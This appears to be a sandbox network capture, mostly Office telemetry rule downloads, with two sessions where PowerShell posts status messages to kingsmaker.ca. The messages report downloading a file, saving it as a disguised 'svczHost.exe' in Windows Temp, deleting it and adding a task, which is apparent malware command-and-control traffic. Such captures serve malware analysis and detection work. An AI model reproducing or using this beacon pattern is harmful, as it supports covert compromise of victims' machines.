                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:28 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            121192.168.2.549844104.21.75.1704437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:28 UTC284OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 200
                                                                                                                            2024-11-29 07:31:28 UTC200OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                            Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
                                                                                                                            2024-11-29 07:31:29 UTC996INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:28 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpRAJe4%2Bq8yOkveICbfMLddV7i8refYyXnP2eFssHrCoL9uRqZDYe%2B8oxlDeASlxUAfTK9T2quU1huO3u3VKMANk4qcd34t8AMoxC9CtrpQvxbITUYMpXiukX9W16HB8kwisdnrZWfjN"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=26179&min_rtt=1071&rtt_var=29643&sent=20792&recv=9823&lost=0&retrans=0&sent_bytes=29605290&recv_bytes=166904&delivery_rate=26343779&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e5f6cd430f4a-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1508&rtt_var=576&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1144&delivery_rate=1936339&cwnd=168&unsent_bytes=0&cid=8c72225707e64d17&ts=1002&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            122192.168.2.54984313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:28 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:28 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1401
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                            x-ms-request-id: 6df8c679-c01e-008e-163d-417381000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073128Z-174f7845968xlwnmhC1EWR0sv80000000zdg0000000062q2
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:28 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            123192.168.2.54984513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:29 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:30 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1364
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                            x-ms-request-id: 97972df5-901e-008f-1591-3f67a6000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073130Z-174f7845968cdxdrhC1EWRg0en0000000zng00000000236d
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:30 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            124192.168.2.54984613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:30 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:30 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1391
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                            x-ms-request-id: 59abf26e-d01e-0065-394a-40b77a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073130Z-174f7845968jrjrxhC1EWRmmrs0000000zsg0000000044s1
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:30 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            125192.168.2.54984713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:30 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:30 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1354
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                            x-ms-request-id: 32ac451f-a01e-0050-6491-3fdb6e000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073130Z-174f7845968kvnqxhC1EWRmf3g0000000kfg0000000020y3
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:30 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            126192.168.2.54984813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:30 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:30 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1403
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                            x-ms-request-id: 6bdf3827-f01e-0085-6b0a-4188ea000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073130Z-174f7845968cdxdrhC1EWRg0en0000000zk0000000005pa4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:30 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            127192.168.2.549850104.21.75.1704437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:30 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 97
                                                                                                                            2024-11-29 07:31:30 UTC97OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                            Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
                                                                                                                            2024-11-29 07:31:31 UTC996INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:31 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0X0BW1vl0BrJ4VGAYI7jtxx3FlfAGmbPtpBaPXO1qhtJY4zY4TmehvQZydaoir5eQ6mJ2%2BDPlEfkpOIlKBkhcJyxxv1NtPuL7h55em9wahfD5E7QPeu6KHMdBtejexpw3nLLXJtzWcY4"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=54464&min_rtt=1400&rtt_var=10456&sent=26567&recv=12393&lost=0&retrans=48&sent_bytes=37956693&recv_bytes=139303&delivery_rate=18660531&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e604fbddc35a-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1534&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1040&delivery_rate=1793611&cwnd=246&unsent_bytes=0&cid=f8be8886216da064&ts=1039&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            128192.168.2.54984913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:30 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:31 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1366
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                            x-ms-request-id: 106d4033-401e-008c-3691-3f86c2000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073130Z-174f7845968qj8jrhC1EWRh41s0000000zkg0000000048rh
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:31 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            129192.168.2.54985113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:31 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:32 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:32 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1399
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                            x-ms-request-id: e44244ee-a01e-001e-216b-4049ef000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073132Z-174f7845968l4kp6hC1EWRe8840000000zy000000000228s
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:32 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            130192.168.2.54985413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:32 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:32 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:32 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1366
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                            x-ms-request-id: 629a3d73-e01e-0052-0991-3fd9df000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073132Z-174f78459688l8rvhC1EWRtzr00000000c3g000000009yff
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
